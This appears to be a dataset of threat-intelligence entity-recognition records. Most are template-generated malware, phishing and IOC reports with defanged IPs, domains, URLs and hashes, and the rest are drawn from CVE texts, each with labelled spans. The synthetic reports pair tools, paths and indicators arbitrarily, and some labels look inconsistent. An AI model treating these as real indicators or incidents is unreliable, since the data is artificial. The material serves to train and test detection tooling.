06948d09af44afdd113fc92928e6fe8b9aa65470558e30794a97933dd51e4d9e). Upon execution on SonicWall SMA, the sample creates /dev/shm/helper.sh and injects into legitimate processes. Network analysis shows beaconing to 172 [ . ] 182 [ . ] 49 [ . ] 98 every 60 seconds and DNS queries to staticcloud[ . ]dev. The second stage was fetched from hxxps://storage-cdn[.]live/secure/token and written to /opt/app/bin/beacon.dll. 
The payload uses PsExec-style techniques for defense evasion. A secondary hash (SHA1: e153351fcd673f171a2db9790bc0f24b2f9f26bb) was extracted from the unpacked payload.", "spans": {"Malware: Lumma Stealer": [[25, 38]], "Indicator: 06948d09af44afdd113fc92928e6fe8b9aa65470558e30794a97933dd51e4d9e": [[48, 112]], "System: SonicWall SMA": [[133, 146]], "Indicator: 172.182.49.98": [[261, 292]], "Indicator: staticcloud.dev": [[329, 348]], "Indicator: https://storage-cdn.live/secure/token": [[384, 423]], "Indicator: e153351fcd673f171a2db9790bc0f24b2f9f26bb": [[550, 590]]}, "info": {"id": "synth_v2_00637", "source": "defanged_augment"}} {"text": "Credentials targeted by PinchDuke include ones associated with the following software or services : The Bat! , Yahoo! , Mail[.]ru , Passport[ . ]Net , Google Talk , Netscape Navigator , Mozilla Firefox , Mozilla Thunderbird , Internet Explorer , Microsoft Outlook , WinInet Credential Cache , Lightweight Directory Access Protocol ( LDAP ) .", "spans": {"Malware: PinchDuke": [[24, 33]], "Indicator: Mail.ru": [[120, 129]], "Indicator: Passport.Net": [[132, 148]], "Organization: Microsoft": [[246, 255]]}, "info": {"id": "cyberner_stix_train_002841", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Mandiant identified a large-scale phishing operation. Emails originated from verify@mail-service[ . ]info and confirm@urgent-notice[ . ]online, spoofing legitimate services. Victims were directed to hxxp://static-static[ . ]club/portal/verify which hosted a credential harvesting page on relay-mail[ . ]dev. A secondary link hxxp://edge-mail[ . ]site/login delivered Emotet (SHA256: 3bf7d3c91132b6d5231429b9b547b91951c423589d1e09945ff9e86ca3448c46). The malware was saved to /tmp/update.dll and established C2 with 185 [ . ] 199 [ . ] 206 [ . 
] 27.", "spans": {"Organization: Mandiant": [[26, 34]], "Indicator: verify@mail-service.info": [[103, 131]], "Indicator: confirm@urgent-notice.online": [[136, 168]], "Indicator: http://static-static.club/portal/verify": [[225, 268]], "Indicator: relay-mail.dev": [[314, 332]], "Indicator: hxxp://edge-mail.site/login": [[351, 382]], "Malware: Emotet": [[393, 399]], "Indicator: 3bf7d3c91132b6d5231429b9b547b91951c423589d1e09945ff9e86ca3448c46": [[409, 473]], "Indicator: 185.199.206.27": [[541, 573]]}, "info": {"id": "synth_v2_00879", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: f_ncm: fix potential NULL ptr deref in ncm_bitrate()\n\nIn Google internal bug 265639009 we've received an (as yet) unreproducible\ncrash report from an aarch64 GKI 5.10.149-android13 running device.\n\nAFAICT the source code is at:\n hxxps://android[.]googlesource[.]com/kernel/common/+/refs/tags/ASB-2022-12-05_13-5.10\n\nThe call stack is:\n ncm_close() -> ncm_notify() -> ncm_do_notify()\nwith the crash at:\n ncm_do_notify+0x98/0x270\nCode: 79000d0b b9000a6c f940012a f9400269 (b9405d4b)\n\nWhich I believe disassembles to (I don't know ARM assembly, but it looks sane enough to me...):\n\n // halfword (16-bit) store presumably to event->wLength (at offset 6 of struct usb_cdc_notification)\n 0B 0D 00 79 strh w11, [x8, #6]\n\n // word (32-bit) store presumably to req->Length (at offset 8 of struct usb_request)\n 6C 0A 00 B9 str w12, [x19, #8]\n\n // x10 (NULL) was read here from offset 0 of valid pointer x9\n // IMHO we're reading 'cdev->gadget' and getting NULL\n // gadget is indeed at offset 0 of struct usb_composite_dev\n 2A 01 40 F9 ldr x10, [x9]\n\n // loading req->buf pointer, which is at offset 0 of struct usb_request\n 69 02 40 F9 ldr x9, [x19]\n\n // x10 is null, crash, appears to be attempt to read cdev->gadget->max_speed\n 4B 5D 40 B9 ldr w11, [x10, #0x5c]\n\nwhich seems to line up with ncm_do_notify() case 
NCM_NOTIFY_SPEED code fragment:\n\n event->wLength = cpu_to_le16(8);\n req->length = NCM_STATUS_BYTECOUNT;\n\n /* SPEED_CHANGE data is up/down speeds in bits/sec */\n data = req->buf + sizeof *event;\n data[0] = cpu_to_le32(ncm_bitrate(cdev->gadget));\n\nMy analysis of registers and NULL ptr deref crash offset\n (Unable to handle kernel NULL pointer dereference at virtual address 000000000000005c)\nheavily suggests that the crash is due to 'cdev->gadget' being NULL when executing:\n data[0] = cpu_to_le32(ncm_bitrate(cdev->gadget));\nwhich calls:\n ncm_bitrate(NULL)\nwhich then calls:\n gadget_is_superspeed(NULL)\nwhich reads\n ((struct usb_gadget *)NULL)->max_speed\nand hits a panic.\n\nAFAICT, if I'm counting right, the offset of max_speed is indeed 0x5C.\n(remember there's a GKI KABI reservation of 16 bytes in struct work_struct)\n\nIt's not at all clear to me how this is all supposed to work...\nbut returning 0 seems much better than panic-ing...", "spans": {"Indicator: https://android.googlesource.com/kernel/common/+/refs/tags/ASB-2022-12-05_13-5.10": [[312, 397]], "System: Linux kernel": [[7, 19]], "Organization: Google": [[139, 145]], "Vulnerability: NULL pointer dereference": [[1755, 1779]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-52894"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 71[.]227[.]188[.]3, the Europol IR team identified Dridex running as C:\\Users\\admin\\Downloads\\lsass.dmp. The threat actor, believed to be Velvet Tempest, used Brute Ratel for credential harvesting and Havoc for lateral movement. Exfiltrated data was sent to update-cache[.]cc and syncauth[.]link. The initial dropper (MD5: 62472b50f126dc17cca3586b6796feda) was delivered via a phishing email from noreply@secure-verify[.]net. 
A second C2 node was observed at 10[.]42[.]62[.]126, with a persistence mechanism writing to /dev/shm/ntds.dit.", "spans": {"Indicator: 71.227.188.3": [[64, 82]], "Organization: Europol": [[88, 95]], "Malware: Dridex": [[115, 121]], "Indicator: update-cache.cc": [[322, 339]], "Indicator: syncauth.link": [[344, 359]], "Indicator: 62472b50f126dc17cca3586b6796feda": [[387, 419]], "Indicator: noreply@secure-verify.net": [[461, 488]], "Indicator: 10.42.62.126": [[523, 541]]}, "info": {"id": "synth_v2_00337", "source": "defanged_augment"}} {"text": "Argo CD is a declarative continuous deployment for Kubernetes. Argo CD Cluster secrets might be managed declaratively using Argo CD / kubectl apply. As a result, the full secret body is stored in`kubectl[ . ]kubernetes[ . ]io/last-applied-configuration` annotation. pull request #7139 introduced the ability to manage cluster labels and annotations. Since clusters are stored as secrets it also exposes the `kubectl[ . ]kubernetes[ . ]io/last-applied-configuration` annotation which includes full secret body. In order to view the cluster annotations via the Argo CD API, the user must have `clusters, get` RBAC access. **Note:** In many cases, cluster secrets do not contain any actually-secret information. But sometimes, as in bearer-token auth, the contents might be very sensitive. The bug has been patched in versions 2.8.3, 2.7.14, and 2.6.15. Users are advised to upgrade. Users unable to upgrade should update/deploy cluster secret with `server-side-apply` flag which does not use or rely on `kubectl[ . ]kubernetes[ . ]io/last-applied-configuration` annotation. 
Note: annotation for existing secrets will require manual removal.", "spans": {"Indicator: kubectl.kubernetes.io": [[196, 225], [408, 437], [1002, 1031]], "System: Kubernetes": [[51, 61]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-40029"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Merlin artifacts at C:\\Users\\admin\\Downloads\\agent.py. Memory dump analysis confirmed execution of PowerShell Empire. Registry modifications pointed to persistence via /var/tmp/dropper.ps1. Network forensics identified connections to 88[.]10[.]230[.]69 and staticsync[ . ]dev. Email headers traced the initial vector to admin@login-portal[ . ]tech. File C:\\Users\\admin\\Downloads\\lsass.dmp (SHA1: ae3d16263e58bfa0a677b1ee6b210a0caf73630e) was identified as the initial dropper. A staging URL hxxps://staticgateway[.]info/wp-content/uploads/doc.php resolved to 172[.]11[.]177[.]42. Secondary artifact hash: SHA256: 2a7cd051324007715a838d9875881e215d18022c00bd5dd9943c6c2ebe78ce01.", "spans": {"Indicator: 88.10.230.69": [[306, 324]], "Indicator: staticsync.dev": [[329, 347]], "Indicator: admin@login-portal.tech": [[392, 419]], "Indicator: ae3d16263e58bfa0a677b1ee6b210a0caf73630e": [[468, 508]], "Indicator: https://staticgateway.info/wp-content/uploads/doc.php": [[563, 618]], "Indicator: 172.11.177.42": [[631, 650]], "Indicator: 2a7cd051324007715a838d9875881e215d18022c00bd5dd9943c6c2ebe78ce01": [[685, 749]]}, "info": {"id": "synth_v2_01139", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Recorded Future identified a large-scale phishing operation. Emails originated from notification@urgent-notice[ . ]online and billing@login-portal[ . ]tech, spoofing legitimate services. Victims were directed to hxxps://gateway-api[.]online/assets/js/payload.js which hosted a credential harvesting page on sync-mail[ . ]top. A secondary link hxxp://updatestorage[ . 
]io/secure/token delivered WarmCookie (SHA1: 89580e72ffddd4a0d7785cdb8e836db32862c30a). The malware was saved to /etc/cron.d/ntds.dit and established C2 with 113[.]76[.]189[.]64.", "spans": {"Organization: Recorded Future": [[26, 41]], "Indicator: notification@urgent-notice.online": [[110, 147]], "Indicator: billing@login-portal.tech": [[152, 181]], "Indicator: hxxps://gateway-api.online/assets/js/payload.js": [[238, 287]], "Indicator: sync-mail.top": [[333, 350]], "Indicator: hxxp://updatestorage.io/secure/token": [[369, 409]], "Malware: WarmCookie": [[420, 430]], "Indicator: 89580e72ffddd4a0d7785cdb8e836db32862c30a": [[438, 478]], "Indicator: 113.76.189.64": [[551, 570]]}, "info": {"id": "synth_v2_01085", "source": "defanged_augment"}} {"text": "Malware Analysis Report: NjRAT (MD5: 0c4a37d206508e4ea364dcb3c2a826da). Upon execution on Atlassian Confluence, the sample creates C:\\Users\\Public\\Documents\\csrss.exe and injects into legitimate processes. Network analysis shows beaconing to 20[.]255[.]157[.]190 every 60 seconds and DNS queries to gatewayupdate[ . ]com. The second stage was fetched from hxxps://storagesecure[ . ]club/download/update.exe and written to C:\\Users\\Public\\Documents\\taskhost.exe. The payload uses Nmap-style techniques for defense evasion. 
A secondary hash (SHA256: 242d7091d4af7d7070db8571e9b757ed39fcba7ea2cd3c208712e6e200a262f6) was extracted from the unpacked payload.", "spans": {"Malware: NjRAT": [[25, 30]], "Indicator: 0c4a37d206508e4ea364dcb3c2a826da": [[37, 69]], "System: Atlassian Confluence": [[90, 110]], "Indicator: 20.255.157.190": [[242, 262]], "Indicator: gatewayupdate.com": [[299, 320]], "Indicator: hxxps://storagesecure.club/download/update.exe": [[356, 406]], "Indicator: 242d7091d4af7d7070db8571e9b757ed39fcba7ea2cd3c208712e6e200a262f6": [[548, 612]]}, "info": {"id": "synth_v2_00626", "source": "defanged_augment"}} {"text": "Under a model known as sandboxing , most Android apps are n't permitted to access passwords or other data available to most other apps . There are several indicators , which have led CTU researchers to believe with high confidence that NICKEL ACADEMY is behind the current spearphishing campaign . APT33 : 91[.]230[.]121[.]144 remserver[.]ddns[.]net . A rough translation of this message is as follows : Hack520 seems to be very interested in hosting services and his profile fits that of a system administrator profile with some programming and hacking skills .", "spans": {"System: Android": [[41, 48]], "Organization: CTU": [[183, 186]], "Indicator: 91.230.121.144": [[306, 326]], "Indicator: remserver.ddns.net": [[327, 349]]}, "info": {"id": "cyberner_stix_train_000887", "source": "defanged_augment"}} {"text": "Blog Post by ESET Research: Tracking Lazarus Group's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-24628 against Apache Struts deployments. The initial access vector involves spear-phishing emails from it@credential-check[ . ]site delivering BatLoader. Post-compromise, the attackers deploy QakBot and use CrackMapExec for reconnaissance. C2 infrastructure includes 172[.]39[.]4[.]118 and cache-api[ . ]org. A staging server at hxxps://datadata[.]online/download/update.exe hosts additional tooling. 
Key artifact: C:\\Users\\Public\\Documents\\agent.py (MD5: a1ebfcac112d4eb9c509c4755348418a).", "spans": {"Organization: ESET Research": [[13, 26]], "Vulnerability: CVE-2020-24628": [[130, 144]], "System: Apache Struts": [[153, 166]], "Indicator: it@credential-check.site": [[242, 270]], "Malware: BatLoader": [[282, 291]], "Malware: QakBot": [[331, 337]], "Indicator: 172.39.4.118": [[406, 424]], "Indicator: cache-api.org": [[429, 446]], "Indicator: hxxps://datadata.online/download/update.exe": [[468, 513]], "Indicator: a1ebfcac112d4eb9c509c4755348418a": [[595, 627]]}, "info": {"id": "synth_v2_01630", "source": "defanged_augment"}} {"text": "Malware Analysis Report: IcedID (SHA256: eb94e503b38830cb04fcd556cef4a792ac8516422ecc34b5238ea5530052972f). Upon execution on Citrix NetScaler, the sample creates C:\\Windows\\Tasks\\taskhost.exe and injects into legitimate processes. Network analysis shows beaconing to 64 [ . ] 2 [ . ] 198 [ . ] 199 every 60 seconds and DNS queries to portal-cdn[ . ]info. The second stage was fetched from hxxp://data-storage[ . ]live/wp-content/uploads/doc.php and written to C:\\Users\\Public\\Documents\\config.dat. The payload uses CrackMapExec-style techniques for defense evasion. A secondary hash (MD5: 3a74d18f311a4500832ee852e632e689) was extracted from the unpacked payload.", "spans": {"Malware: IcedID": [[25, 31]], "Indicator: eb94e503b38830cb04fcd556cef4a792ac8516422ecc34b5238ea5530052972f": [[41, 105]], "System: Citrix NetScaler": [[126, 142]], "Indicator: 64.2.198.199": [[268, 298]], "Indicator: portal-cdn.info": [[335, 354]], "Indicator: http://data-storage.live/wp-content/uploads/doc.php": [[390, 445]], "Indicator: 3a74d18f311a4500832ee852e632e689": [[590, 622]]}, "info": {"id": "synth_v2_00579", "source": "defanged_augment"}} {"text": "IOC Bulletin - BlackCat Campaign:\nNetwork Indicators:\n- 172[.]63[.]16[.]146\n- 10[.]177[.]152[.]136\n- 182[.]229[.]111[.]235\n- relayproxy[.]cc\n- cloudcache[ . 
]link\nURLs:\n- hxxps://sync-storage[ . ]top/wp-content/uploads/doc.php\n- hxxp://mail-api[.]io/gate.php\nEmail Senders:\n- noreply@login-portal[.]tech\n- account@account-update[ . ]xyz\nFile Indicators:\n- SHA1: b565ee4b18d6ae432adbc4a3beb7a995a14568b6\n- SHA1: 70bedfaf1bba22f050f537e73ef6af12c4410ee3\n- Drop path: C:\\Program Files\\Common Files\\backdoor.elf", "spans": {"Malware: BlackCat": [[15, 23]], "Indicator: 172.63.16.146": [[56, 75]], "Indicator: 10.177.152.136": [[78, 98]], "Indicator: 182.229.111.235": [[101, 122]], "Indicator: relayproxy.cc": [[125, 140]], "Indicator: cloudcache.link": [[143, 162]], "Indicator: https://sync-storage.top/wp-content/uploads/doc.php": [[171, 226]], "Indicator: hxxp://mail-api.io/gate.php": [[229, 258]], "Indicator: noreply@login-portal.tech": [[276, 303]], "Indicator: account@account-update.xyz": [[306, 336]], "Indicator: b565ee4b18d6ae432adbc4a3beb7a995a14568b6": [[362, 402]], "Indicator: 70bedfaf1bba22f050f537e73ef6af12c4410ee3": [[411, 451]]}, "info": {"id": "synth_v2_01354", "source": "defanged_augment"}} {"text": "During the 2013 attacks , the Wild Neutron actor successfully compromised and leveraged the website www[ . ]iphonedevsdk[ . 
]com , which is an iPhone developers forum .", "spans": {"Indicator: www.iphonedevsdk.com": [[100, 128]]}, "info": {"id": "dnrti_train_002466", "source": "defanged_augment"}} {"text": "A backdoor also known as: Script.SWF.Cxx+.C173 SWF.Kit.Angler.G Exploit-SWF.x Bloodhound.Flash.31 SWF/Exploit.CVE-2015-3090.A SWF_EKSPLOYT.ED Swf.Packer.Angle-1 Script.SWF.Cxx+.C173 Script.SWF.Cxx+.C173 Script.SWF.Cxx+.C173 Script.SWF.Cxx+.C173 Exploit.SWF.438 SWF_EKSPLOYT.ED BehavesLike.Flash.Exploit.kb EXP/CVE-2015-3090[.]AU Exploit:SWF/Netis.B Script.SWF.Cxx+.C173 Script.SWF.Cxx+.C173 SWF.Win32.Script.800529 Exploit.SWF SWF/ExKit.AQ!exploit", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: CVE-2015-3090.AU": [[310, 328]]}, "info": {"id": "cyner2_train_002004", "source": "defanged_augment"}} {"text": "Shamoon2 : 69[ . ]87[ . ]223[ . ]26:8080/p .", "spans": {"Malware: Shamoon2": [[0, 8]], "Indicator: 69.87.223.26:8080/p": [[11, 42]]}, "info": {"id": "cyberner_stix_train_001409", "source": "defanged_augment"}} {"text": "Check Point Research detected a multi-stage attack chain. The initial phishing email from report@auth-check[ . ]org contained a link to hxxps://relaystorage[.]tech/login. This redirected to hxxp://cloudstorage[.]online/assets/js/payload.js on syncapi[ . ]tech. A secondary email from contact@identity-verify[ . ]cc pointed to hxxp://data-portal[.]live/wp-content/uploads/doc.php which delivered SmokeLoader. The final payload callback was hxxp://portal-api[.]info/portal/verify resolving to 192 [ . ] 140 [ . ] 80 [ . ] 246 via gateway-data[ . 
]org.", "spans": {"Organization: Check Point Research": [[0, 20]], "Indicator: report@auth-check.org": [[90, 115]], "Indicator: hxxps://relaystorage.tech/login": [[136, 169]], "Indicator: http://cloudstorage.online/assets/js/payload.js": [[190, 239]], "Indicator: syncapi.tech": [[243, 259]], "Indicator: contact@identity-verify.cc": [[284, 314]], "Indicator: http://data-portal.live/wp-content/uploads/doc.php": [[326, 378]], "Malware: SmokeLoader": [[395, 406]], "Indicator: hxxp://portal-api.info/portal/verify": [[439, 477]], "Indicator: 192.140.80.246": [[491, 523]], "Indicator: gateway-data.org": [[528, 548]]}, "info": {"id": "synth_v2_01808", "source": "defanged_augment"}} {"text": "IOCs C & C IP addresses : 155 [ . ] 133 [ . ] 82 [ . ] 181 155[.]133[.]82[.]240 155 [ . ] 133 [ . ] 82 [ . ] 244 185 [ . ] 234 [ . ] 218 [ . ] 59 195 [ . ] 22 [ . ] 126 [ . ] 160 195[.]22[.]126[.]163 195 [ . ] 22 [ . ] 126 [ . ] 80 195[.]22[.]126[.]81 5[.]45[.]73[.]24 5 [ . ] 45 [ . ] 74 [ . ] 130 IP addresses from which the Trojan was downloaded : 185 [ . ] 174 [ . ] 173 [ . ] 31 185[.]234[.]218[.]59 188[.]166[.]156[.]110 195[.]22[.]126[.]160 195 [ . ] 22 [ . ] 126 [ . ] 80 195[.]22[.]126[.]81 195 [ . ] 22 [ . ] 126 [ . ] 82 195 [ . ] 22 [ . ] 126 [ . 
] 83 SHA256 : 158c7688877853ffedb572ccaa8aa9eff47fa379338151f486e46d8983ce1b67 3aedbe7057130cf359b9b57fa533c2b85bab9612c34697585497734530e7457d f3ae6762df3f2c56b3fe598a9e3ff96ddf878c553be95bacbd192bd14debd637 df61a75b7cfa128d4912e5cb648cfc504a8e7b25f6c83ed19194905fef8624c8 c0cfd462ab21f6798e962515ac0c15a92036edd3e2e63639263bf2fd2a10c184 d791e0ce494104e2ae0092bb4adc398ce740fef28fa2280840ae7f61d4734514 38dcec47e2f4471b032a8872ca695044ddf0c61b9e8d37274147158f689d65b9 27cea60e23b0f62b4b131da29fdda916bc4539c34bb142fb6d3f8bb82380fe4c 31edacd064debdae892ab0bc788091c58a03808997e11b6c46a6a5de493ed25d 87ffec0fe0e7a83e6433694d7f24cfde2f70fc45800aa2acb8e816ceba428951 eabc604fe6b5943187c12b8635755c303c450f718cc0c8e561df22a27264f101 Kernel Backdoor found in Gadgets Powered by Popular Chinese ARM Maker May 12 , 2016 Mohit Kumar How to Hack an Android device ? It is possibly one of the most frequently asked questions on the Internet .", "spans": {"System: ARM": [[1348, 1351]], "System: Android": [[1399, 1406]], "Indicator: 158c7688877853ffedb572ccaa8aa9eff47fa379338151f486e46d8983ce1b67": [[573, 637]], "Indicator: 3aedbe7057130cf359b9b57fa533c2b85bab9612c34697585497734530e7457d": [[638, 702]], "Indicator: f3ae6762df3f2c56b3fe598a9e3ff96ddf878c553be95bacbd192bd14debd637": [[703, 767]], "Indicator: df61a75b7cfa128d4912e5cb648cfc504a8e7b25f6c83ed19194905fef8624c8": [[768, 832]], "Indicator: c0cfd462ab21f6798e962515ac0c15a92036edd3e2e63639263bf2fd2a10c184": [[833, 897]], "Indicator: d791e0ce494104e2ae0092bb4adc398ce740fef28fa2280840ae7f61d4734514": [[898, 962]], "Indicator: 38dcec47e2f4471b032a8872ca695044ddf0c61b9e8d37274147158f689d65b9": [[963, 1027]], "Indicator: 27cea60e23b0f62b4b131da29fdda916bc4539c34bb142fb6d3f8bb82380fe4c": [[1028, 1092]], "Indicator: 31edacd064debdae892ab0bc788091c58a03808997e11b6c46a6a5de493ed25d": [[1093, 1157]], "Indicator: 87ffec0fe0e7a83e6433694d7f24cfde2f70fc45800aa2acb8e816ceba428951": [[1158, 1222]], "Indicator: 
eabc604fe6b5943187c12b8635755c303c450f718cc0c8e561df22a27264f101": [[1223, 1287]], "Indicator: 155.133.82.181": [[26, 58]], "Indicator: 155.133.82.240": [[59, 79]], "Indicator: 155.133.82.244": [[80, 112]], "Indicator: 185.234.218.59": [[113, 145], [384, 404]], "Indicator: 195.22.126.160": [[146, 178], [427, 447]], "Indicator: 195.22.126.163": [[179, 199]], "Indicator: 195.22.126.80": [[200, 231], [448, 479]], "Indicator: 195.22.126.81": [[232, 251], [480, 499]], "Indicator: 5.45.73.24": [[252, 268]], "Indicator: 5.45.74.130": [[269, 298]], "Indicator: 185.174.173.31": [[351, 383]], "Indicator: 188.166.156.110": [[405, 426]], "Indicator: 195.22.126.82": [[500, 531]], "Indicator: 195.22.126.83": [[532, 563]]}, "info": {"id": "cyner2_train_001310", "source": "defanged_augment"}} {"text": "CVE-2025-36568: Dell PowerProtect Data Domain BoostFS for client of Feature Release versions 7 [ . ] 7 [ . ] 1 [ . ] 0 through 8.5, LTS2025 release version 8[.]3[.]1[.]0 through 8[.]3[.]1[.]20, LTS2024 release versions 7 [ . ] 13 [ . ] 1 [ . ] 0 through 7 [ . ] 13 [ . ] 1 [ . ] 50, contain an insufficiently protected credentials vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to credential exposure. The attacker may be able to use the exposed credentials to access the system with privileges of the compromised account.", "spans": {"Vulnerability: CVE-2025-36568": [[0, 14]], "Vulnerability: credential exposure": [[447, 466]], "Indicator: 7.7.1.0": [[93, 118]], "Indicator: 8.3.1.0": [[156, 169]], "Indicator: 8.3.1.20": [[178, 192]], "Indicator: 7.13.1.0": [[219, 245]], "Indicator: 7.13.1.50": [[254, 281]]}, "info": {"id": "nvd_2025_36568", "source": "defanged_augment"}} {"text": "IOC Bulletin - Qbot Campaign:\nNetwork Indicators:\n- 175 [ . ] 73 [ . ] 224 [ . ] 187\n- 192 [ . ] 117 [ . ] 67 [ . ] 218\n- 192 [ . ] 143 [ . ] 12 [ . 
] 42\n- static-cloud[.]site\n- proxy-portal[.]net\nURLs:\n- hxxps://updatesync[.]com/assets/js/payload.js\n- hxxps://storagemail[.]net/download/update.exe\nEmail Senders:\n- confirm@identity-verify[ . ]cc\n- helpdesk@urgent-notice[ . ]online\nFile Indicators:\n- MD5: 5cb18d679a4bf76b5a1e7a2f30dcb15a\n- MD5: 7f4f4c47383272809dca376dcf235946\n- Drop path: C:\\ProgramData\\taskhost.exe", "spans": {"Malware: Qbot": [[15, 19]], "Indicator: 175.73.224.187": [[52, 84]], "Indicator: 192.117.67.218": [[87, 119]], "Indicator: 192.143.12.42": [[122, 153]], "Indicator: static-cloud.site": [[156, 175]], "Indicator: proxy-portal.net": [[178, 196]], "Indicator: https://updatesync.com/assets/js/payload.js": [[205, 250]], "Indicator: hxxps://storagemail.net/download/update.exe": [[253, 298]], "Indicator: confirm@identity-verify.cc": [[316, 346]], "Indicator: helpdesk@urgent-notice.online": [[349, 382]], "Indicator: 5cb18d679a4bf76b5a1e7a2f30dcb15a": [[407, 439]], "Indicator: 7f4f4c47383272809dca376dcf235946": [[447, 479]]}, "info": {"id": "synth_v2_01406", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Mandiant identified a large-scale phishing operation. Emails originated from service@phishing-domain[ . ]com and alert@secure-verify[ . ]net, spoofing legitimate services. Victims were directed to hxxp://cache-api[.]com/panel/index.html which hosted a credential harvesting page on mailauth[.]xyz. A secondary link hxxp://cache-proxy[.]info/admin/config delivered XLoader (SHA1: 12fd8df0b48bbff062fe975ef441159baa9e569d). The malware was saved to C:\\Users\\admin\\AppData\\Local\\Temp\\loader.exe and established C2 with 212 [ . ] 51 [ . ] 62 [ . 
] 11.", "spans": {"Organization: Mandiant": [[26, 34]], "Indicator: service@phishing-domain.com": [[103, 134]], "Indicator: alert@secure-verify.net": [[139, 166]], "Indicator: hxxp://cache-api.com/panel/index.html": [[223, 262]], "Indicator: mailauth.xyz": [[308, 322]], "Indicator: hxxp://cache-proxy.info/admin/config": [[341, 379]], "Malware: XLoader": [[390, 397]], "Indicator: 12fd8df0b48bbff062fe975ef441159baa9e569d": [[405, 445]], "Indicator: 212.51.62.11": [[542, 572]]}, "info": {"id": "synth_v2_00894", "source": "defanged_augment"}} {"text": "Blog Post by INTERPOL: Tracking Ember Bear's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2021-23031 against MOVEit Transfer deployments. The initial access vector involves spear-phishing emails from hr@document-share[.]link delivering SmokeLoader. Post-compromise, the attackers deploy Qbot and use Sliver for reconnaissance. C2 infrastructure includes 172 [ . ] 218 [ . ] 192 [ . ] 50 and backupportal[.]link. A staging server at hxxps://datadata[ . ]xyz/gate.php hosts additional tooling. 
Key artifact: C:\\Program Files\\Common Files\\helper.sh (MD5: 0eeb77513d93383a1d309b5599e37af6).", "spans": {"Organization: INTERPOL": [[13, 21]], "Vulnerability: CVE-2021-23031": [[122, 136]], "System: MOVEit Transfer": [[145, 160]], "Indicator: hr@document-share.link": [[236, 260]], "Malware: SmokeLoader": [[272, 283]], "Malware: Qbot": [[323, 327]], "Indicator: 172.218.192.50": [[390, 422]], "Indicator: backupportal.link": [[427, 446]], "Indicator: https://datadata.xyz/gate.php": [[468, 501]], "Indicator: 0eeb77513d93383a1d309b5599e37af6": [[588, 620]]}, "info": {"id": "synth_v2_01537", "source": "defanged_augment"}} {"text": "Artifact Analysis for AsyncRAT campaign:\nStage 1 dropper at C:\\Windows\\Temp\\beacon.dll - SHA1: b90b4560c9197981aa5a95c7348d5df888efd628\nStage 2 loader at /tmp/implant.so - SHA1: 1f6b4150b02a63eeff0296edd950b72f5e0ed9f9\nFinal payload at C:\\Users\\admin\\AppData\\Local\\Temp\\update.dll - MD5: 83ed60a4a50bfe7ed5f0897654afd28c\nExfiltration module - SHA1: ba7b284bac5010da8cf97d47200fb08e9d8a705b\nAll stages communicated with 59[.]16[.]197[.]107. ADFind signatures detected in Stage 2.", "spans": {"Malware: AsyncRAT": [[22, 30]], "Indicator: b90b4560c9197981aa5a95c7348d5df888efd628": [[95, 135]], "Indicator: 1f6b4150b02a63eeff0296edd950b72f5e0ed9f9": [[178, 218]], "Indicator: 83ed60a4a50bfe7ed5f0897654afd28c": [[288, 320]], "Indicator: ba7b284bac5010da8cf97d47200fb08e9d8a705b": [[349, 389]], "Indicator: 59.16.197.107": [[419, 438]]}, "info": {"id": "synth_v2_01974", "source": "defanged_augment"}} {"text": "The Silence.Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer . 
The June 2017 sample of Clayslide contained the same OfficeServicesStatus[.]vbs file found in the ISMAgent Clayslide document , but instead of having the payload embedded in the macro as segregated base64 strings that would be concatenated , this variant obtained its payload from multiple cells within the \" Incompatible \" worksheet .", "spans": {"Malware: Silence.Main Trojan": [[4, 23]], "Malware: Clayslide": [[153, 162]], "Indicator: OfficeServicesStatus.vbs file": [[182, 213]], "Malware: ISMAgent Clayslide document": [[227, 254]]}, "info": {"id": "cyberner_stix_train_005358", "source": "defanged_augment"}} {"text": "IOC Bulletin - Vidar Campaign:\nNetwork Indicators:\n- 10[.]247[.]19[.]146\n- 10 [ . ] 230 [ . ] 216 [ . ] 79\n- 20[.]247[.]238[.]195\n- login-login[ . ]top\n- edge-update[.]info\nURLs:\n- hxxp://backup-relay[ . ]io/gate.php\n- hxxp://loginstorage[.]live/assets/js/payload.js\nEmail Senders:\n- noreply@phishing-domain[ . ]com\n- report@auth-check[.]org\nFile Indicators:\n- SHA1: 988831c8980abdf6e5fe8c0421575ffdba5a5893\n- MD5: 7d59ef93027fadaa5f6407ea17cc3db5\n- Drop path: C:\\Users\\admin\\Downloads\\dropper.ps1", "spans": {"Malware: Vidar": [[15, 20]], "Indicator: 10.247.19.146": [[53, 72]], "Indicator: 10.230.216.79": [[75, 106]], "Indicator: 20.247.238.195": [[109, 129]], "Indicator: login-login.top": [[132, 151]], "Indicator: edge-update.info": [[154, 172]], "Indicator: hxxp://backup-relay.io/gate.php": [[181, 216]], "Indicator: hxxp://loginstorage.live/assets/js/payload.js": [[219, 266]], "Indicator: noreply@phishing-domain.com": [[284, 315]], "Indicator: report@auth-check.org": [[318, 341]], "Indicator: 988831c8980abdf6e5fe8c0421575ffdba5a5893": [[367, 407]], "Indicator: 7d59ef93027fadaa5f6407ea17cc3db5": [[415, 447]]}, "info": {"id": "synth_v2_01443", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Sharphound artifacts at /var/tmp/lsass.dmp. 
